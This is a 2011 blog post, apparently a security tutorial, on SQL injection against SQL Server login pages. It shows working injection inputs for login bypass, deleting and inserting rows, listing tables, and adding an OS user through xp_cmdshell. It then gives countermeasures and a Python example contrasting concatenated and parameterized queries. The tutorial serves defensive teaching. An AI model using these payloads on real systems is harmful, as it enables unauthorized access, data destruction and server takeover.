Friday, December 23, 2011

SQL Injection

This post is intended for learning purposes, on the topic of penetration testing and how to handle bad user input so that your site and systems are not misused.
SQL Injection:
SQL injection is the most popular SQL vulnerability used to attack SQL databases, and the attack may also affect the hosting operating system. When an attacker gains access to your database, he tries to escalate his privileges to gain administrative permissions.
If the attacker gains administrative permissions on your database management system, he will try to execute the system commands your DBMS allows, then create or escalate a user account to get administrative permissions on your server. Think about what he can do with administrative permissions on your server: simply put, he owns your server, not you.
In this post I will introduce you to basic SQL injection concepts and walk through some hands-on examples to show how simple it is to do. (Notice: this post is about how to protect yourself from these types of attack, not about gaining access to other people's systems; try it only on your own systems or on systems you are authorized to test.)
Consider this query (SQL Server):
SELECT * FROM users WHERE username = 'user' AND password = 'password';
When this query is executed in SSMS it returns the user's data when the username is user and the password is password. But if we have a web page and want to authenticate users, we ask each user to provide this information.
If we use ASP.Net, for example, with a user textbox component to enter the username and a password textbox component to enter the password, the query string is built by concatenation:
QueryString = "SELECT * FROM users WHERE username = '" + user.Text + "' AND password = '" + password.Text + "'";
When the user enters valid input (e.g. username = user, password = password), the query sent to the SQL Server database is:
SELECT * FROM users WHERE username = 'user' AND password = 'password'
BUT if the user enters this information (username: ' OR 1 = 1; --  password: anything), the query becomes:
SELECT * FROM users WHERE username = '' OR 1 = 1 ; -- AND password = 'anything';
The user then gets access to our database, because the system returns the whole users table (1 = 1 is always true; this is the trick) and the rest of the statement is skipped because it is commented out (-- starts a comment in SQL Server).
Consider these examples, where the user not only accesses the system but does malicious things like deleting, updating or even inserting data.
If the user executes these queries he gets all the tables in the database:
SELECT * FROM information_schema.tables   (SQL Server 2008)

SELECT * FROM sysobjects WHERE xtype = 'U'   (SQL Server 2000)
Once he has a list of all the user tables in the database he can do anything.
DELETE all users from the users table (this means nobody in the users table can access the system, and the business stops):
If he enters username = ' OR 1 = 1; Delete users --
Password = anything
SELECT * FROM users WHERE username = '' OR 1 = 1 ; Delete users -- AND password = 'anything';
Now the users table is empty.
He can insert a new user:
Username = ' OR 1 = 1; Insert into users (username, password) values ('new', 'new'); --
Password = anything
SELECT * FROM users WHERE username = '' OR 1 = 1 ; Insert into users (username, password) values ('new', 'new'); -- AND password = 'anything';
And many more; to see more, watch the demo at http://www.youtube.com/watch?v=cBqJJKxOWFw&feature=youtu.be
Think about these queries:
You can pass operating system commands using master.dbo.xp_cmdshell, e.g.
username = ' OR 1 = 1; EXEC master.dbo.xp_cmdshell 'net user (newuser) / ADD' --
password = anything.
xp_cmdshell is disabled by default (we will talk about this later).
Now you have a user on the local system (and much more).
You can even shut down the database.
Countermeasures:
· Disable any feature provided by your DBMS that you do not use, e.g. xp_cmdshell; in the previous example you saw how malicious it can be. Your DBMS must be well configured; attackers always exploit you through your bad configuration.
· Least privilege: every user in your database must be given only the minimum permissions needed to complete his tasks. If your user is a reporting user he should get read permission only, so the exploits above for delete, insert and update will not happen.
· Validate user input. This is very important: you have to check whether the user entered valid or invalid input and take action according to the input.
· Always provide a custom error message if an error occurs; do not let SQL Server provide error messages to your end user, since he may use those messages badly. Try … catch exception handling always helps.
· Use database abstraction (refer to my post about databases at http://elmozamil.blogspot.com); where possible use views, so users have no access to database objects except the specified views.
· Use stored procedures and give the user permission on the stored procedures to update, insert, delete and select. I think you must use a stored procedure for every database manipulation where you ask users for input. Stored procedures use parameters and handle each parameter as its declared data type, and they limit the user to the size of the parameter: if the username must be 10 characters, the SP gets only the first 10 characters if the user enters more.
· Use parameterized SQL commands.
· Always remember Google is your best friend; Google it and you will find more.
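As an added example (not the post's own ASP.Net code), here is the login query from the QueryString walk-through above next to the parameterized fix from the countermeasures list, written in Python against an in-memory SQLite table that stands in for the SQL Server users table; the table rows are constructed, and the bypass input ' OR 1 = 1; -- is the one from the post.

```python
import sqlite3


def setup_db():
    """Constructed stand-in for the post's users table (plaintext
    passwords, exactly as the post's query assumes)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("user", "password"), ("admin", "s3cret")],
    )
    conn.commit()
    return conn


def login_concat(conn, username, password):
    """Vulnerable: the query is built by string concatenation, as the
    post's QueryString is. Whatever the user typed becomes SQL."""
    sql = (
        "SELECT * FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchall()


def login_param(conn, username, password):
    """Fixed: parameterized query. The driver binds the values, so the
    quote, OR 1 = 1 and -- are just characters inside the username."""
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    conn = setup_db()
    payload = "' OR 1 = 1; --"  # the post's bypass input
    # Valid credentials: one row either way.
    print(login_concat(conn, "user", "password"))
    # Concatenation: the bypass returns every row (authentication bypassed).
    print(login_concat(conn, payload, "anything"))
    # Parameterized: the same input matches nothing.
    print(login_param(conn, payload, "anything"))
```

SQLite's execute() runs only one statement per call, so the stacked DELETE and INSERT variants from the post cannot be reproduced with this stand-in; the OR 1 = 1 bypass is enough to show the difference between the two functions.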
I hope you enjoy.
In the demo I will exploit SQL Server and MySQL databases and gain permissions on the hosting operating system.
Written by: Elmozamil Elamir Hamid
